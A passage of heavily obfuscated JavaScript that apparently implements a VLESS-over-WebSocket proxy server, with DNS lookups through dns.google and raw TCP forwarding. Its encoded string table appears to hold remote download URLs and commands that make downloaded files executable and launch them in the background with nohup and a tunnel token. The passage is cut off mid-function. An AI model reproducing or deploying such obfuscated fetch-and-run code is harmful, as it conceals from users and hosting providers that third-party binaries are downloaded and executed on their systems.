_0x5c4644={_0x549aed:0x229,_0x5e7e76:0x92,_0x5476fa:0x13b},_0x5b1430={_0x30f30e:0x37c,_0x3b608a:0x340,_0x17b171:0x306,_0xcb93ed:0x384},_0x2c985b={_0x4d1b2c:0x113,_0x584a8c:0x128,_0x2868d4:0xc2},_0x1551bd={_0x163010:0x1dc,_0x39e71f:0x1f6},_0x52e5fd={_0x326c2a:0x1fd},_0x439f4b={_0x479923:0xe7,_0x1f1b25:0x1ca,_0x2728f4:0x694};function _0x197400(_0x931519,_0x133887,_0x467e85,_0x138818){return _0xcb92c6(_0x931519-_0x439f4b._0x479923,_0x133887-_0x439f4b._0x1f1b25,_0x931519- -_0x439f4b._0x2728f4,_0x467e85);}const _0x1b38bc={'pqpVe':function(_0x3c1fa3,_0xb9ef5){function _0x3d9789(_0x156b3f,_0x19cfcc,_0x5a6a5f,_0x463d8e){return _0x84e0(_0x156b3f- -_0x52e5fd._0x326c2a,_0x5a6a5f);}return _0x1f922b[_0x3d9789(_0x48da4c._0x1987e1,_0x48da4c._0x41c5e2,-0x17,_0x48da4c._0x329fda)](_0x3c1fa3,_0xb9ef5);},'mZvez':_0x197400(-_0x31a860._0x2cb2c1,_0x31a860._0x36eece,-_0x31a860._0x5b3022,-_0x31a860._0x5d54d3),'uOPwJ':_0x1f922b[_0x52bf20(_0x31a860._0x167e23,_0x31a860._0x839160,_0x31a860._0x763673,0x350)],'GcBCj':function(_0x192d7b,_0x51c9d9){function _0x55d54e(_0x2bd191,_0x5c17a7,_0x472fa2,_0x29f66d){return _0x52bf20(_0x2bd191-_0x1551bd._0x163010,_0x5c17a7,_0x472fa2-0x34,_0x29f66d- -_0x1551bd._0x39e71f);}return _0x1f922b[_0x55d54e(0x10c,_0x4045e4._0x51415e,_0x4045e4._0x525ee0,_0x4045e4._0x4d3e73)](_0x192d7b,_0x51c9d9);},'hcQxb':function(_0x2192e1,_0x1a1eeb){const _0x74f034={_0x5a9c3a:0x109};function _0x423660(_0x497a2d,_0x24711a,_0x1121ec,_0x5ac454){return _0x52bf20(_0x497a2d-0xe2,_0x497a2d,_0x1121ec-_0x74f034._0x5a9c3a,_0x24711a- -0x29f);}return _0x1f922b[_0x423660(0x61,_0x2c985b._0x4d1b2c,_0x2c985b._0x584a8c,_0x2c985b._0x2868d4)](_0x2192e1,_0x1a1eeb);},'xucZb':function(_0x44b39f,_0x1459b8){const _0x33eb98={_0x4f3317:0x111,_0x57c4bd:0x13f,_0x1379d8:0xd3};function _0x3e39c2(_0x376bfd,_0x4d0f33,_0x4ab6dd,_0x500769){return _0x52bf20(_0x376bfd-_0x33eb98._0x4f3317,_0x4ab6dd,_0x4ab6dd-_0x33eb98._0x57c4bd,_0x376bfd- -_0x33eb98._0x1379d8);}return _0x1f922b[_0x3e39c2(_0x5b1430._0x30f30e,_0x5b1430._0x3b608a,_0x5b1430._0x17b171,_0x5b1430._0xcb93ed)](_0x44b39f,_0x1459b8);},'SITqW':_0x197400(_0x31a860._0x110339,-0xf,_0x31a860._0x1b5039,0xbd),'FBbJe':_0x1f922b[_0x52bf20(_0x31a860._0x1c7a05,_0x31a860._0x19958e,_0x31a860._0x465796,_0x31a860._0x46bdae)],'AYsjM':function(_0x1ecf4e,_0x1d7923){return _0x1f922b['AbGMQ'](_0x1ecf4e,_0x1d7923);},'kQOWn':function(_0x4ac39b,_0x3af425){return _0x1f922b['gmbKw'](_0x4ac39b,_0x3af425);},'eKFYU':function(_0x58dad9){return _0x58dad9();}};if(_0x39d88d>=DNS_SERVERS[_0x52bf20(_0x31a860._0x5cdda4,_0x31a860._0x5c9d9a,_0x31a860._0x46457d,0x35d)]){_0x171733(new Error(_0x197400(-_0x31a860._0x463bc4,_0x31a860._0x2ab011,-_0x31a860._0x42e0b2,-_0x31a860._0x3ba5de)+_0x5d90b3+_0x197400(-_0x31a860._0x31b61f,-_0x31a860._0x4aab69,-0xe1,-0x6b)));return;}const _0x5e2cd1=DNS_SERVERS[_0x39d88d];_0x39d88d++;const _0x43c85f='https://dns.google/resolve?name='+_0x1f922b[_0x52bf20(_0x31a860._0x2e10e4,_0x31a860._0x5ac976,_0x31a860._0x5742f2,0x318)](encodeURIComponent,_0x5d90b3)+_0x197400(-_0x31a860._0x45e65f,-_0x31a860._0x1a9fa9,-_0x31a860._0x1a2f69,-_0x31a860._0x13c64c),_0x3dec06={};_0x3dec06[_0x52bf20(_0x31a860._0x11f041,0x438,_0x31a860._0x369f20,0x3dc)]=_0x1f922b[_0x52bf20(_0x31a860._0x465f03,_0x31a860._0x225569,0x3b1,_0x31a860._0x30b483)];const _0x1329a4={};_0x1329a4[_0x52bf20(_0x31a860._0x3495d3,_0x31a860._0x1549f7,_0x31a860._0x8b2a2,0x3ec)]=0x1388;function _0x52bf20(_0x31349a,_0x107361,_0x2ec1ba,_0x19c29d){return _0xcb92c6(_0x31349a-_0x3d5187._0x52ceb0,_0x107361-_0x3d5187._0x81c27d,_0x19c29d- -_0x3d5187._0x4d2dbf,_0x107361);}_0x1329a4[_0x197400(_0x31a860._0x547fd9,_0x31a860._0x290d5f,-_0x31a860._0x164781,-_0x31a860._0x4b9279)]=_0x3dec06,axios['get'](_0x43c85f,_0x1329a4)['then'](_0x979d80=>{const _0x4c9d81={_0x219164:0x1bc,_0x2f213b:0xba};function _0x921693(_0x13d864,_0x21031b,_0x3032c1,_0x54196e){return _0x197400(_0x54196e-_0x5c4644._0x549aed,_0x21031b-_0x5c4644._0x5e7e76,_0x21031b,_0x54196e-_0x5c4644._0x5476fa);}const _0x43ead4={};_0x43ead4[_0x1b2aa0(_0xfdc0e4._0x3c45c6,_0xfdc0e4._0x5c20b8,_0xfdc0e4._0x4e9469,0x1be)]=_0x1b38bc['mZvez'],_0x43ead4['qdsEB']=_0x1b38bc[_0x921693(_0xfdc0e4._0x5704d3,_0xfdc0e4._0x3c44fc,_0xfdc0e4._0xf1a9ae,_0xfdc0e4._0x97dcc1)];function _0x1b2aa0(_0x5d57b1,_0x3045fd,_0x43e232,_0x1068fa){return _0x52bf20(_0x5d57b1-_0x4c9d81._0x219164,_0x5d57b1,_0x43e232-_0x4c9d81._0x2f213b,_0x43e232- -0x178);}const _0x13b172=_0x43ead4,_0x4927cb=_0x979d80['data'];if(_0x1b38bc[_0x921693(_0xfdc0e4._0xc0d885,_0xfdc0e4._0x1cbfdf,0x129,_0xfdc0e4._0x3dc0c0)](_0x4927cb['Status'],-0x4*0x3cd+0xc2a+0x30a)&&_0x4927cb['Answer']&&_0x1b38bc[_0x921693(_0xfdc0e4._0x1298a5,_0xfdc0e4._0x3555ef,_0xfdc0e4._0x61ebd,_0xfdc0e4._0x435cd2)](_0x4927cb[_0x921693(_0xfdc0e4._0x2078af,_0xfdc0e4._0x426c2b,0x213,_0xfdc0e4._0x1d5ede)][_0x921693(0x1f6,0xc7,_0xfdc0e4._0x4c9bd1,_0xfdc0e4._0x48cc31)],-0x1be1+-0x10ad*0x1+0x2c8e)){if(_0x1b38bc[_0x921693(_0xfdc0e4._0xef3470,_0xfdc0e4._0x1b8b38,_0xfdc0e4._0x4fcdb9,0x1c9)](_0x1b38bc[_0x921693(_0xfdc0e4._0x3a87f1,0xd9,_0xfdc0e4._0x4fea6c,_0xfdc0e4._0x451e91)],_0x1b38bc['FBbJe'])){if(_0x30f13b){const _0xf8608c={};_0xf8608c[_0x921693(_0xfdc0e4._0x450662,_0xfdc0e4._0x43e5dd,_0xfdc0e4._0x374783,_0xfdc0e4._0x41d2b6)]=_0x13b172[_0x921693(0x13a,_0xfdc0e4._0x11356a,_0xfdc0e4._0x25f043,_0xfdc0e4._0x49b1c4)],_0x41c609[_0x921693(_0xfdc0e4._0x3568e4,_0xfdc0e4._0x22a95d,_0xfdc0e4._0x1ddc04,_0xfdc0e4._0x519078)](0x265*-0x5+0xbba+-0x107*-0x1,_0xf8608c),_0x2b5318[_0x1b2aa0(_0xfdc0e4._0x216c0b,_0xfdc0e4._0x328c08,0x1df,_0xfdc0e4._0x3345ab)](_0x13b172[_0x921693(_0xfdc0e4._0x1c09d3,_0xfdc0e4._0x296491,_0xfdc0e4._0x497461,_0xfdc0e4._0x18426f)]);return;}const _0x5ded06={};_0x5ded06[_0x921693(_0xfdc0e4._0x3f3015,_0xfdc0e4._0xf1a9ae,_0xfdc0e4._0x435cd2,_0xfdc0e4._0x41d2b6)]=_0x921693(_0xfdc0e4._0x5a503b,_0xfdc0e4._0x478b21,0x290,_0xfdc0e4._0x5ae2e3),_0x436da2['writeHead'](0x962+-0x19a7+-0xf*-0x123,_0x5ded06),_0xb63020[_0x1b2aa0(_0xfdc0e4._0x248aa4,_0xfdc0e4._0x237db4,0x1df,_0xfdc0e4._0x1a38ca)](_0x4e6057);}else{const _0x1d76fc=_0x4927cb[_0x1b2aa0(0x272,0x29c,0x296,0x29c)][_0x921693(_0xfdc0e4._0x3be0eb,_0xfdc0e4._0xa6aa68,_0xfdc0e4._0x31edb1,_0xfdc0e4._0x2b5f1a)](_0x388ed6=>_0x388ed6[_0x1b2aa0(0x289,0x1f9,0x290,0x33e)]===-0x141*-0xd+0x94d*0x1+0x1*-0x1999);if(_0x1d76fc){if(_0x1b38bc[_0x1b2aa0(_0xfdc0e4._0x243c32,_0xfdc0e4._0x42626b,0x1b8,_0xfdc0e4._0x2548a3)]('PZejL',_0x921693(_0xfdc0e4._0x408637,_0xfdc0e4._0x2def65,0x219,0x18f)))_0x4cb322=_0x166df0['slice'](_0x3c389d,_0x1b38bc['pqpVe'](_0x3b5410,0x2*0x926+0x1*0x198f+0x1*-0x2bd7))[_0x921693(_0xfdc0e4._0x1b8b38,_0xfdc0e4._0x25b597,_0xfdc0e4._0x336ebd,_0xfdc0e4._0x5c8128)]('.'),_0x552a33+=0xea3+0x8bf*0x1+-0x175e;else{_0x1b38bc[_0x1b2aa0(_0xfdc0e4._0x81f1e0,0x2ac,_0xfdc0e4._0x5a47be,_0xfdc0e4._0x2b957d)](_0x59c3ea,_0x1d76fc[_0x1b2aa0(0x2f4,0x2aa,_0xfdc0e4._0x542b15,_0xfdc0e4._0x5f6a96)]);return;}}}}_0x1b38bc[_0x1b2aa0(_0xfdc0e4._0x2f8bf9,_0xfdc0e4._0x48f04a,_0xfdc0e4._0x4bd40f,_0xfdc0e4._0x3be0eb)](_0x5f13d5);})[_0x52bf20(_0x31a860._0x1030b4,0x428,_0x31a860._0x1bdf9d,0x43f)](_0x3f7d4c=>{_0x1f922b['LtVrZ'](_0x5f13d5);});}_0x58471f[_0xcb92c6(_0x15d2a6._0x4c24e5,_0x15d2a6._0x4376b1,_0x15d2a6._0xf1bea,_0x15d2a6._0xa1cacc)](_0x5f13d5);});}function _0x36d7(){const _0x474b28=['E30Uy29UC3rYDwn0B3iOiNjLDhvYBIb0AgLZiIKOicK','C01UDM8','EMfLt3O','C2HLBgW','Dvz4whG','zejnC3O','vwjNvLy','tM90iezVDw5KcG','mtG1ndzure1nwfi','CMvHzfvjBNq4','Ahr0Chm6lY9HCM02nc5ZC3nZlM55yY5TBI92mq','Bg9N','yxHPB3m','A09Mtee','wen0wuS','u3ziDNO','zNrkzwy','zvbWDw4','DgHLBG','r3LvtuS','uejlwxG','Ewr3ALO','u2vYDMvY','AMv3D2C','ls10Bhm','DgvZDa','CefYEMy','s29ssu4','zgf0yq','yxbWBhK','rMfPBgvKihrVihjLC29SDMuG','mJe1zNj6teDi','qwnJzxb0','AfPArLu','ic1Wia','ufbzBey','C1Psuue','q2zcEhy','u3Pts0G','Ahr0Chm6lY9HBwq2nc5ZC3nZlM55yY5TBI92mq','vxvgA2y','AeLtEwq','EhHXBxa','BNbTihj1BM5PBMCGzxjYB3i6','uM1wwxa','ChmGyxv4ihWGz3jLCcaTDIaIz3jLCciGFcbNCMvWiciUl1TUxxbTiG','r0Puuve','Dgv4Dc9ODg1S','DgLTzw91Da','whHmtxu','wvLXAeG','BurWzxe','u1vcx1bbveG','ndaZodq0qvbPr25O','q01buxa','ELD5CMm','tLrOseO','wMXlyvu','wwrIrKK','tKvAsefFue9sva','y3j5ChrV','ms4XlJeUmq','tNnUwwW','DgfIBgu','zxHJzxb0Aw9U','qNfAsLO','D2Xqrw4','AwPSs3a','CuT1t3m','vwnlsK4','y3jLyxrLsgfZAa','Cgf0Aa','zKXgEM4','shvMqxe','ywjzrvO','y29UC3rYDwn0B3i','DhLWzq','qvzQu2W','yxbWBgLJyxrPB24Vzg5ZlwPZB24','qunny0W','Dfnvz2K','q2THvfG','qw5ZD2vY','tu5qAxu','r1jbtgy','tK5PENe','r3HAzMq','B25Jzq','y3jLyxrLv3jPDgvtDhjLyw0','A1fpv24','C2XPy2u','yMn5vum','zgvJB2rL','DxrMoa','suLSD20','u2vYDMvYigLZihj1BM5PBMCGB24GCg9YDca','Du9qD0O','EhrjsMG','zLrztxm','zgLNzxn0','qvLvEuK','svDkrvC','AM9PBG','zxL1A1u','y29UBMvJDgLVBG','C2vHCMnO','vKDdwe0','z3vOs3y','t216AMq','s0ryzxC','jMzWpwnOCM9Tzsz0ExbLpxDZjMHVC3q9','zw52','EKzfvNi','BgDvCeC','wKLQzvu','tKvAsefFu0vsvKvs','uuP4zeu','zxjYB3i','vvvjra','qMfYrhm','DwnYB3m','BNbTigLZigfSCMvHzhKGCNvUBMLUzYWGC2TPCcbYDw5UAw5NlI4U','r1bWsuu','Ce9jDKu','Cg9W','wfPksem','EwjLBeC','z0DWwMe','B0zKDxO','mJm4oensyw9XBG','oc44lJqUna','y2f0y2G','tLD2z0m','wuv3yuK','uu1XyMW','DhjHy2u','zuTgwvu','wKDYBKG','rgvUy0e','yMfZzty0','zu1XrNq','AgvHzgvYCW','CMvHzfvjBNqXnKjf','Aw5MBW','C3bSAxq','yw5kAwW','q09TzM8','CxbdBvm','zMLUAxnO','ywTnAgq','x19WCM90B19F','weXtDLi','D3jPDgvizwfK','qMnhrve','z2v0','uNDds24','CunYs1u','BxLTB3O','y2XPzw50x3nLy3jLDdOG','Agv4','mJa1mW','rM1jvhO','l2jPBI9IyxnO','y2XVC2u','s1P1vKq','uLvzzeu','jNbHDgG9jtjg','sKvJDva','A3DIENC','BNbT','otyZndjhy1vNEfm','ic0TzgLZywjSzs1HDxrVlxvWzgf0zsaTlxjLCg9YDc1KzwXHEsa0ic0TC2TPCc1JB25Uic0TC2TPCc1WCM9JCYa+l2rLDI9UDwXSidi+jJeGjG','y2fruMy','vfnNAxq','uMPIA3a','u2Tds2e','y2HTB2qGk3GGBNbT','q0LUzeK','turbzK0','rMXlufG','sgvSBg8GD29YBgqH','y29UBMvJDa','CMv0DxjUicHMDw5JDgLVBIGPia','yNvMzMvY','qxv0B21HDgLJiefJy2vZCYbuyxnRigfKzgvKihn1y2nLC3nMDwXSEq','wLHet08','cNnRAxbFy29UBMvJDgLVBL9JB3vUDdOGDhj1zqPZA2LWx3bYB2nZx2nVDw50oIb0CNvLcNrLBxbLCMf0DxjLoIbMywXZzqP0Bhm6ia','DM1breK','y29Uy2f0','zhnMrwO','uu52y2W','renrD2i','cNvZzv9NAxrLzv90B191CgDYywrLoIbMywXZzqP1C2vFAxb2nL9JB3vUDhj5x2nVzgu6igzHBhnLcNv1Awq6ia','zfnKEgi','zMT4yMO','AgnrEgi','Au1pC3q','z21Is3C','wxDMrwW','yMLUza','zMfSC2u','ntu5odeYDMThBvrM','y2zrzfK','Ahr0Chm6lY8','v2vmCe8','sNvczKy','AMPsugy','u1bIEwO','cMrLyNvNoIbMywXZzqPKAxnHyMXLx2f1Dg9FDxbKyxrLoIb0CNvLcMrPC2fIBgvFy29TBwfUzf9LEgvJDxrLoIbMywXZzqPKAxnHyMXLx2zVCMnLx3vWzgf0ztOGDhj1zqPKAxnHyMXLx25HDdOGzMfSC2ukzgLZywjSzv9Zzw5Kx3f1zxj5oIbMywXZzqPNChu6igzHBhnLcMLUC2vJDxjLx3rSCZOGDhj1zqPPCf9YzxbVCNrFCgvYAw9KoIaXodaWcNjLCg9YDf9KzwXHEtOGnaPZzxj2zxi6ia','BhfduwW','ugrLq3i','BgLZDgvU','tKvAsefFs0vz','CMvKDwnL','q0jwrhG','zgTbBKC','u3vIC1a','u3rOuxK','qvvut19bq0nfu1m','Ahr0Ca','wgzvywe','qvLZAK0','u3rHDhvZ','r2TktLG','Cg9YDa','C3vIC3rY','CMvHzezPBgu','CKvtBMK','DMXLC3m6lY8','DLvcCKS','t2X5tw0','rMjjBuS','D2fYBG','tNfxC24','tu5Jv1O','qKnWAMC','CNLuv2i','vw1Jr2W','u2rgrK4','CMDSsfe','AvDzDxO','y29UC29Szq','BwfW','wurtEwu','zxzLCNK','AwX0rLy','Ahr0Chm6lY9HCgKUAxaUC2iVz2vVAxa','A2DbD2O','uvfqCvq','z1z1sgy','quDxCNq','y0D5AuC','CePkt3e','quLOtui','oJq0mZ9LBMnYExb0Aw9Upw5VBMuMC2vJDxjPDhK9DgXZjNnUAt0','q21MB3C','tfP2y28','rfrrCgK','D3jPDgvgAwXLu3LUyW','y291BNrYEv9JB2rL','zw5K','CgrotKG','BNbTigLZihj1BM5PBMC','reTpr2i','mtiZnc5HyMmUy29T','tK5ABxK','BgvUz3rO','q09ztfq','A3DXtuO','mJa5nG','y3jLyxrLu2vYDMvY','qxbRuMG','vLj4shG','Awj0ufa','u0LuCvC','DxHjqxm','wNDkvgC','CwrZrui','Dw5SAw5R','ChjVDg90ExbL','su5Hy1y','nfDRwfH1yW','D3jPDgu','EhzVu1q','r1j5DLa','Duf2tNq','thr5Cha','BwvZC2fNzq','C2vYDMvY','q29UDgvUDc1uExbL','Cg9ZDa','tML5uNC','yxjTnJq','zMLUza','jNr5Cgu9qq','re9nquLo','s3z1rK0','AvDpBMG','DffYq3i','u3veC2y','ExL1zvK','yKn2uwy','uhf6sw4','r2ncq2O','ue9sva','Aw5KzxGUAhrTBa','A21SEhO','DxrMltG','t3bUvxq','C2v0C2LKig5VAhvWic4VBNbTic1JignVBMzPzY55yw1Sid4Vzgv2l251BgWGmJ4MmsaM','thriD1C','ugnJrxe','C2v0C2LKig5VAhvWic4VBNbTic1Zia','zLLJBvK','zNjVBq','DNbhs3G','ANLOA20','C3rYzwfT','tKvAseeGDMfYAwfIBguGAxmGzw1WDhKSihnRAxaGCNvUBMLUzW','ugfgquO','B3HSDLm','mJmWnZK2rwzYENbs','DxjS','EKjMz1q','ofrYzfjuyW','A0v0vuK','zxjYB3i6ia','Dg9tDhjPBMC','sLjIuuK','Ahr0Chm6lY9HCM02nc5ZC3nZlM55yY5TBI9Hz2vUDa','v0XPqwC','rK9Oze0','y29UzMLNlNLHBwW','Dg9Nzfy','rfz6qvu','uujcBuW','whHqugy','BwnjC08','wuHys3G','C253CKq','CMvWBgfJzq','C2HHmJi0','nti4mdmYmhPktK5TuW','su9RAwe','Ag9ZDa','DxbKyxrL','ue1pzfu','uMHWqMm','rg14rgy','CgLWzq','qNvhwvG','EurMEfO','ihDPDgGGywXSierouYbZzxj2zxjZ','C2neu0W','qvv4v3O','zxfXrKS','Dgv4Dc9WBgfPBG','EhvJwMi','Aw5JBhvKzxm','AvjJvuC','Dhj1zq'];_0x36d7=function(){return _0x474b28;};return _0x36d7();}function handleVlessConnection(_0x505344,_0x87e439){const _0x510446={_0x56e061:0x24e,_0x3fff52:0x1f4,_0x325839:0x20c,_0x3c476b:0x39,_0x1ad6a8:0xd9,_0x562399:0x1ca,_0x1b7f7c:0xde,_0x251286:0x101,_0x1b489c:0x149,_0x1ade83:0x19a,_0x2893ae:0x1d4,_0x3fae1f:0x19e,_0x623803:0x26c,_0x34196c:0x18c,_0x6d6191:0x168,_0x1ee712:0x21f,_0x39f9e1:0xc0,_0x2ecfdf:0xb2,_0x1fc914:0x98,_0x1eebd3:0x7a,_0x3305fb:0x17,_0x5e368a:0x43,_0x2b3631:0x55,_0x514135:0x7a,_0x54d46a:0x68,_0x46aaa4:0xae,_0x164f8d:0x3c,_0x493c98:0x4f,_0x24f8c6:0x252,_0x2a3432:0x1fe,_0x4ef783:0x263,_0xf36d91:0x126,_0x22b43e:0x75,_0x70f9f8:0x96,_0xe2c13c:0x232,_0x3dc0c4:0x1a8,_0x3ab51e:0x38,_0x1d83fc:0x166,_0x1c58d6:0xc8,_0x22942c:0xcb,_0x7c516d:0x2f,_0xf2833a:0xe4,_0x6728ee:0x16,_0x5c5758:0x19d,_0x15f3b8:0x247,_0x49540e:0x142,_0x15faf8:0x12e,_0x517c1e:0xe5,_0x5c98d8:0x168,_0x1d4c76:0x9a,_0x301787:0x9c,_0x20c3e9:0x103,_0x46d36d:0xf1,_0x232f98:0xa7,_0x83da80:0x7c,_0x12d4f3:0x169,_0x5795ea:0x9a,_0x471b55:0xfb,_0x7de654:0xdc,_0x394555:0x91,_0x21eed5:0x94,_0x307266:0x1aa,_0x35edff:0x18c,_0x378d32:0x9,_0x44beff:0x1b,_0x220214:0x51},_0x15d39c={_0xd5db2a:0x494,_0x1579e1:0x42a,_0x2e44ca:0x42f,_0x2643bd:0x3fc,_0x483f3d:0x32f,_0x547aba:0x347,_0x220cef:0x3e4,_0x5bbdfd:0x428},_0x411617={_0x3110ea:0x58},_0x43561a={_0x32b3fc:0x483,_0x28b469:0x43a,_0x476e45:0x457,_0x4631fd:0x3f4,_0x1dc083:0x139,_0x3ee85e:0x16f,_0x4e407e:0x1f1,_0x49eac7:0x1e7,_0x31e92b:0x156,_0x5701db:0x12d,_0x31dd67:0x1d8},_0x5260ac={_0x373480:0xcd,_0x1d6dcd:0x36,_0x5ad32c:0x54,_0x518bac:0x56,_0x22be12:0x8c,_0x8d7789:0x7,_0x1daf10:0xd4,_0x35969e:0x4a,_0x265ac7:0xc,_0x569829:0x41},_0x1c194d={_0x411cad:0x93,_0x341c55:0x2bc,_0x266276:0x78},_0x108755={_0x575348:0x14,_0x3d9d0c:0x6e},_0x232852={'XxLMu':_0xf79f24(_0x510446._0x56e061,_0x510446._0x3fff52,0x1ef,_0x510446._0x325839),'Omzjd':function(_0x19429b,_0xe22087){return _0x19429b==_0xe22087;},'eyukU':function(_0x545331,_0x1a55af){return _0x545331+_0x1a55af;},'NsnYl':function(_0x19979a,_0x4199db){return _0x19979a+_0x4199db;},'scDSL':function(_0xf64b71,_0x398be2){return _0xf64b71(_0x398be2);}};function _0x1c0903(_0x27dad8,_0x338619,_0x4cb3ff,_0xe2e608){return _0x421fd5(_0x27dad8-_0x108755._0x575348,_0x4cb3ff,_0xe2e608-_0x108755._0x3d9d0c,_0xe2e608-0x1af);}const [_0x12ac60]=_0x87e439,_0x303ff3=_0x87e439[_0x1c0903(-0x6e,-_0x510446._0x3c476b,-_0x510446._0x1ad6a8,-0x7a)](0x6*0x576+0x2659+-0x4a*0xf6,-0x79d+0x1*-0x162f+0x1ddd);if(!_0x303ff3[_0x1c0903(-_0x510446._0x562399,-_0x510446._0x1b7f7c,-_0x510446._0x251286,-_0x510446._0x1b489c)]((_0x2b9f66,_0x2d853d)=>_0x2b9f66==parseInt(uuid[_0x1c0903(-0x20f,-0x198,-0x1b3,-0x15c)](_0x2d853d*(0x1*0x1c33+-0xd15+-0xf1c),0xef+-0x80f+0xa6*0xb),-0x19e0+0x518+0x14d8)))return![];function _0xf79f24(_0xe16c67,_0x82edc8,_0x223e62,_0x5e46cc){return _0x421fd5(_0xe16c67-_0x1c194d._0x411cad,_0x82edc8,_0x223e62-_0x1c194d._0x341c55,_0x5e46cc-_0x1c194d._0x266276);}let _0x8300aa=_0x87e439[_0xf79f24(0x133,_0x510446._0x1ade83,_0x510446._0x2893ae,0x13a)](-0x19a9+0x10e9+0x8d1,0xeae+0x18b*0xb+-0x21b*0xf)['readUInt8']()+(0x12*0x113+-0x1*-0x2084+-0x33c7);const _0x234ae1=_0x87e439[_0xf79f24(_0x510446._0x3fae1f,_0x510446._0x623803,_0x510446._0x2893ae,0x23f)](_0x8300aa,_0x8300aa+=-0xdf3+-0xa3a+-0x1*-0x182f)[_0xf79f24(_0x510446._0x34196c,_0x510446._0x6d6191,0x208,_0x510446._0x1ee712)](-0x2457+0x872*-0x3+-0x33f*-0x13),_0x5027f6=_0x87e439[_0x1c0903(-_0x510446._0x39f9e1,-_0x510446._0x2ecfdf,-_0x510446._0x1fc914,-_0x510446._0x1eebd3)](_0x8300aa,_0x8300aa+=0x9*-0x399+-0x1*0x12c3+-0x3325*-0x1)['readUInt8'](),_0x4054da=_0x232852['Omzjd'](_0x5027f6,-0x78b*0x1+0x17*-0x10f+0x1fe5)?_0x87e439[_0x1c0903(_0x510446._0x3305fb,-_0x510446._0x5e368a,-_0x510446._0x2b3631,-_0x510446._0x514135)](_0x8300aa,_0x8300aa+=-0x6b3+0x46a+-0x1f*-0x13)[_0x1c0903(-_0x510446._0x54d46a,-_0x510446._0x46aaa4,-_0x510446._0x1fc914,-0x6e)]('.'):_0x5027f6==-0xeab*0x1+-0x1f*-0x4+0xe31?new TextDecoder()[_0x1c0903(-_0x510446._0x164f8d,-0x26,-_0x510446._0x493c98,-0x78)](_0x87e439['slice'](_0x232852[_0xf79f24(_0x510446._0x24f8c6,_0x510446._0x2a3432,0x1e1,_0x510446._0x4ef783)](_0x8300aa,0x9d4*0x1+-0x12d7+0x904*0x1),_0x8300aa+=_0x232852[_0x1c0903(-_0x510446._0xf36d91,-_0x510446._0x22b43e,-0x147,-_0x510446._0x70f9f8)](-0x939+-0xa*0x12b+0x14e8,_0x87e439['slice'](_0x8300aa,_0x232852[_0xf79f24(0x162,_0x510446._0xe2c13c,0x1e1,_0x510446._0x3dc0c4)](_0x8300aa,0x2305+-0x865+-0x1a9f))[_0x1c0903(-_0x510446._0x3ab51e,-_0x510446._0x1d83fc,-_0x510446._0x1c58d6,-_0x510446._0x22942c)]()))):_0x232852[_0x1c0903(-_0x510446._0x7c516d,-_0x510446._0xf2833a,_0x510446._0x6728ee,-_0x510446._0x54d46a)](_0x5027f6,-0x158b+-0x1*0xa39+0x1fc7*0x1)?_0x87e439[_0xf79f24(_0x510446._0x5c5758,_0x510446._0x15f3b8,_0x510446._0x2893ae,0x12b)](_0x8300aa,_0x8300aa+=0xb0f+0xef*0xb+-0x1544)[_0x1c0903(-_0x510446._0x49540e,-_0x510446._0x15faf8,-_0x510446._0x517c1e,-_0x510446._0x5c98d8)]((_0x57fd49,_0x4ba08d,_0x4366f0,_0x34ee65)=>_0x4366f0%(-0x11b1*-0x1+0x1533+-0x26e2)?_0x57fd49[_0x1c0903(-0x18b,-0xf3,-0x1a4,-0x181)](_0x34ee65['slice'](_0x4366f0-(-0x19e4*-0x1+0x642+0xd3*-0x27),_0x4366f0+(-0x1ecd+-0x8fc+0x27ca))):_0x57fd49,[])[_0xf79f24(_0x510446._0x1d4c76,_0x510446._0x301787,_0x510446._0x20c3e9,_0x510446._0x46d36d)](_0x1e1a0d=>_0x1e1a0d[_0xf79f24(0x1ac,0x1cd,0x208,0x22e)](-0x1bf3+-0xd42+-0x2935*-0x1)[_0xf79f24(0x18b,0x158,0x158,0xb0)](0x9*-0x2e7+0x24dd+-0xaae))[_0x1c0903(-_0x510446._0x232f98,-_0x510446._0x83da80,-_0x510446._0x5e368a,-0x6e)](':'):'';_0x505344['send'](new Uint8Array([_0x12ac60,0x23f1+0x23cc+-0x47bd]));const _0x214bae=_0x232852[_0x1c0903(-_0x510446._0x12d4f3,-_0x510446._0x5795ea,-_0x510446._0x471b55,-_0x510446._0x7de654)](createWebSocketStream,_0x505344);return _0x232852[_0x1c0903(-0x184,-_0x510446._0x394555,-_0x510446._0x21eed5,-0xdc)](resolveHost,_0x4054da)[_0xf79f24(0x1ba,_0x510446._0x307266,_0x510446._0x35edff,0x22a)](_0x4f79c4=>{const _0x3bd302={_0x34f270:0xd5,_0x2e6402:0x168,_0x21fd23:0x192},_0x1ba689={_0x2c6cad:0x42f,_0x346646:0xdc,_0x1b360b:0xa8},_0x79be7e={_0x3d338f:0x75,_0x398fc5:0x5d,_0x1dca09:0x8a},_0x2f6752={_0x5629e8:0x6,_0x146205:0x503},_0xc9696c={};_0xc9696c[_0x5727ec(_0x43561a._0x32b3fc,0x4b4,0x531,0x4f8)]=_0x5727ec(0x4a4,_0x43561a._0x28b469,_0x43561a._0x476e45,_0x43561a._0x4631fd);function _0x5727ec(_0x514508,_0x1a9617,_0x4ce8e9,_0x5715e0){return _0x1c0903(_0x514508-_0x2f6752._0x5629e8,_0x1a9617-0x27,_0x1a9617,_0x514508-_0x2f6752._0x146205);}function _0x2207b4(_0x5d61e6,_0x2595f0,_0x519c06,_0x2d8143){return _0x1c0903(_0x5d61e6-_0x79be7e._0x3d338f,_0x2595f0-_0x79be7e._0x398fc5,_0x5d61e6,_0x519c06- -_0x79be7e._0x1dca09);}const _0x1aab6b=_0xc9696c,_0x510118={};_0x510118[_0x2207b4(-0x1da,-_0x43561a._0x1dc083,-_0x43561a._0x3ee85e,-0xbc)]=_0x4f79c4,_0x510118[_0x2207b4(-0x20c,-_0x43561a._0x4e407e,-_0x43561a._0x49eac7,-0x26a)]=_0x234ae1,net['connect'](_0x510118,function(){this['write'](_0x87e439[_0x34b06d(0x5a,_0x5260ac._0x373480,0x21,_0x5260ac._0x1d6dcd)](_0x8300aa));function _0x34b06d(_0x4de426,_0x4c7b12,_0x36257a,_0x4e3925){return _0x5727ec(_0x4de426- -_0x1ba689._0x2c6cad,_0x4e3925,_0x36257a-_0x1ba689._0x346646,_0x4e3925-_0x1ba689._0x1b360b);}function _0x4c0acd(_0x17183c,_0x2e0d82,_0x2ffa6a,_0x4105b2){return 